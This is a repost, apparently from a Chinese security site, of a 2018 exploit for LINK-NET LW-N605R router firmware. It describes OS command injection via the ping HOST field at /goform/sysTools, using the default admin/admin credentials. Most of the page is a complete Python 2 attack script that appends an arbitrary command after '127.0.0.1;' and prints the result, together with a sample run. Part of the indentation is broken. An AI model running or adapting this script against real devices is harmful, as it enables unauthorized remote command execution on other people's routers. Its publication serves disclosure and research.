首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
LW-N605R 12.20.2.1486 - Remote Code Execution
来源:@AsrirNassim 作者:Asrir 发布时间:2018-09-11  
# Title: LW-N605R 12.20.2.1486 - Remote Code Execution
# Date: 2018-09-09
# Author: Nassim Asrir
# Vendor: LINK-NET
# Product Link: http://linknet-usa.com/main/product_info.php?products_id=35&language=es
# Firmware version: 12.20.2.1486
# CVE: N/A
 
# Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the
# HOST field of the ping feature at adm/systools.asp.
# Authentication is needed but the default password of admin for the admin
# account may be used in some cases.
 
# Example:
# [root@parrot]─[/home/sniperpex/Desktop]
# #python ./blue.py -t http://host/ -c ls -u admin -p admin
 
'''
 _ __        __    _   _  __    ___  ____  ____     _____            _       _ _  
| |\ \      / /   | \ | |/ /_  / _ \| ___||  _ \   | ____|_  ___ __ | | ___ (_) |_
| | \ \ /\ / /____|  \| | '_ \| | | |___ \| |_) |  |  _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V  V /_____| |\  | (_) | |_| |___) |  _ <   | |___ >  <| |_) | | (_) | | |_
|_____\_/\_/      |_| \_|\___/ \___/|____/|_| \_\  |_____/_/\_\ .__/|_|\___/|_|\__|
                                                              |_|                 
                                                                  @AsrirNassim       
[+] Connection in progress...
[+] Authentication in progress...
[+] Username & Password: OK
[+] Checking for vulnerability...
[!] Command "ls": was executed!
 
var
usr
tmp
sys
sbin
proc
mnt
media
lib
init
home
etc_ro
etc
dev
bin
'''
import urllib2
 
import base64
 
import optparse
 
import sys
 
import bs4
 
banner = """
 _ __        __    _   _  __    ___  ____  ____     _____            _       _ _  
| |\ \      / /   | \ | |/ /_  / _ \| ___||  _ \   | ____|_  ___ __ | | ___ (_) |_
| | \ \ /\ / /____|  \| | '_ \| | | |___ \| |_) |  |  _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V  V /_____| |\  | (_) | |_| |___) |  _ <   | |___ >  <| |_) | | (_) | | |_
|_____\_/\_/      |_| \_|\___/ \___/|____/|_| \_\  |_____/_/\_\ .__/|_|\___/|_|\__|
                                                              |_|                 
                                                                  @AsrirNassim       
"""
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
       
        sys.exit(1)
    else:
        return url+"/goform/sysTools"
 
def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] LW-N605R Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')        
                response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                if "putmsg(mPingCount);" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    if 'e' in  content:
                        print '[!] Command "'+cmd+'": was executed!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                     print '[X] No LW-N605R page found'
                soup = bs4.BeautifulSoup(content, 'html.parser')
 
        for textarea in soup.find_all('textarea'):
                    print textarea.get_text()
            except urllib2.HTTPError, e:
                if e.code == 401:
                   print '[X] Wrong username or password'
                else:
                   print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        print '[X] Connection Error'
 
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-u', '--user', action="store",
                  help="Insert username",
                  )
commandList.add_option('-p', '--pwd', action="store",
                  help="Insert password",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
 
connectionScan(url,user,pwd,cmd)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Socusoft 3GP Photo Slideshow 8
·Photo To Video Converter Profe
·SocuSoft iPod Photo Slideshow
·RPi Cam Control < 6.4.25 - 'pr
·Apache Struts 2 Namespace Redi
·iSmartViewPro 1.5 - 'SavePath
·DVD Photo Slideshow Profession
·Apache Roller 5.0.3 - XML Exte
·Cisco Umbrella Roaming Client
·Ghostscript Failed Restore Com
·Microsoft people 10.1807.2131.
·FTPShell Server 6.80 - 'Add Ac
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved